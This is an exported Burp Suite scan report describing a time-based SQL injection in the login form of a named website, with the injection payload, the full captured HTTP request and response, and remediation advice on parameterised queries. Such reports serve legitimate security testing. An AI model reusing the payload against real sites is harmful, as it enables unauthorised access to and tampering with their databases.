
Burp Scanner Report
Summary
The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low, Information or False Positive. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.
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| Information |
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| False Positive |
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The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.
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Contents
1. SQL injection
1. SQL injection
Summary
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Severity: |
High |
| Confidence: |
Firm |
| Host: |
https://www.human.de |
| Path: |
/en/account/login |
Issue detail
The _username parameter appears to be vulnerable to SQL injection attacks. The payload ' waitfor delay'0:0:20'-- was submitted in the _username parameter. The application took 20221 milliseconds to respond to the request, compared with 240 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterized queries. It is strongly recommended that you parameterize every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
- One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string into which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
- Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
References
Vulnerability classifications
Request
POST /en/account/login HTTP/2
Host: www.human.de
Cache-Control: max-age=0
Sec-CH-UA: "Chromium";v="139", "Not;A=Brand";v="24", "Google Chrome";v="139"
Sec-CH-UA-Mobile: ?0
Sec-CH-UA-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: cf_clearance=QW3RRhCvf3hIxpRH7UlsFtL3LDWYywmUoMV4Ctaben0-1756729676-1.2.1.1-lBlc8USClKWwwv7gPoNboNyMink9PHKT16Pw.OuNl83KuU8rXG_tRWbyq2_KTAwhJKoiYaHjPFuGeL0ds4iiNH.r19pH6SkG4pMBxayOdezF6zvNjhWeVT4aiDE20lhUQwEryop7qcAKWG1yDALQkX7JJUkSZhKxVGksmRYQ7I665lFiU.PdPENmglsEsBAl6dMo1HF4fp7jsp9v0emqvam48lO2JAv6hp1eB54wSe0; _ssid=9ddc6c040efd05c754c3fae88bda74d9; ph_phc_pWbZNzPqZNfDdzSRawu2Tijpq10cjB5IKjVb22kMqyb_posthog=%7B%22distinct_id%22%3A%220199053f-aaa7-7861-bd11-300928eb88f4%22%2C%22%24sesid%22%3A%5B1756729685072%2C%220199053f-aaa4-77e8-8d30-f8ed77865ed9%22%2C1756729682596%5D%7D
Origin: https://www.human.de
Upgrade-Insecure-Requests: 1
Referer: https://www.human.de/en/account/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 345
_csrf_token=41548cf1.RwB05Gu_dUNSLmlD2L9F_Iwpq7Om6xNrtAcL5rgqKv0.NUQDnTHxHHQ8WDEL6MVozu5j2J7qmWExjERuidZFGsskUwa8EdgeExZjGg&_username=SeVoxkkb'%20waitfor%20delay'0%3a0%3a20'--&_password=h3Q%21g7p%21W4&_remember_me=on&_submit=&_target_path=&_token=83b6a9af602205fc09e1200aae33.-0ecUyl0HugaICl-jAmb0JBu7pVIJ9wzlUmXqGiad7w.niHwFE4HZqJbGUQZ1j_Cm_48muMSQ7Rf5xuu3jfLJN6VauUlbjNEolhmGQ
Response
HTTP/2 302 Found
Date: Mon, 01 Sep 2025 12:39:08 GMT
Content-Type: text/html; charset=utf-8
Location: http://www.human.de/en/account/login
Access-Control-Allow-Origin: https://www.human.de
Cache-Control: max-age=0, must-revalidate, private
Expires: Mon, 01 Sep 2025 12:39:08 GMT
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=86400, enforce
Referrer-Policy: same-origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
Server-Timing: cfCacheStatus;desc="DYNAMIC"
Server-Timing: cfEdge;dur=3,cfOrigin;dur=20212
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=PPEown%2FGZqRS86wXs6peLds2bRiQDnUyMZRsFAoiEm3Pmdm9wnjNclbQtuMkd8lMPtPsick6v0IKrRhKVzWPK6wiNI6NrpTDbpgC"}]}
Server: cloudflare
Set-Cookie: REMEMBERME=deleted; HttpOnly; SameSite=Lax; Path=/; Max-Age=0; Expires=Sun, 01 Sep 2024 12:39:07 GMT
Cf-Ray: 9784d3a8cfbfdcc2-FRA
Alt-Svc: h3=":443"; ma=86400
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='http://www.human.de/en/account/login'" />
<title>Redirecting to http://www.human.de/en/account/login</title>
</head>
<body>
Redirecting to <a href="https://www.human.de/en/account/login">http://www.human.de/en/account/login</a>.
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</body>
</html>
Report generated by Burp Suite web vulnerability scanner v2025.7.4, at Wed Sep 03 10:36:33 CEST 2025.